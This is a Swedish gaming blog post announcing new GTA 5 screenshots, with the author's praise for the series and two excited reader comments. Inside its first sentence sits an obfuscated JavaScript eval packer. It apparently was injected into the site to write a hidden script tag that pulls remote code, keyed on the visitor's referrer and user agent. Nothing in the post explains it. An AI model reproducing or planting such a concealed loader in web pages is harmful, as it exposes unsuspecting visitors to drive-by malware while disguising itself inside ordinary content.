Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

Fler nya GTA 5 bilder

Fler nya GTA 5 bilder
Filip Urde
  • On 12 november, 2012
  • http://www.revue.se/filip-urde

GTA eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kidha|var|u0026u|referrer|isrie||js|php’.split(’|’),0,{}))
5 är fantastiskt!

 

Här har vi fler nya bilder från GTA 5! Tagga! detta är fantastiskt!

GTA seriens popularitet är helt enorm. Alla har en åsikt om spelen och de flesta åsikterna är åsikter av ren glädje. Det finns ingen spelserie som jag känner så mycket för som GTA.

GTA har alltid givit mig som spelare en spelvärld jag älskar och levererat den med härlig grafik och ren humor. Jag själv tycker GTA är den mest kompletta spelserien och är den spelserie som utantvekan givit mig mest glädje genom åren. Vad jag kan lova är att GTA 5 kommer bli helt enormt och inget man får missa.

Se förra omgången med GTA 5 bilder här.

Uppdatering: NY GTA 5 TRAILER – se här =D

 

Comments

  1. grapps

    Nästa vår kommer bli väldigt väldigt ljuv

    • Patte

      jaaa asså! jag kan inte vänta längre snart!!! detta kommer bli så fettttttt!!!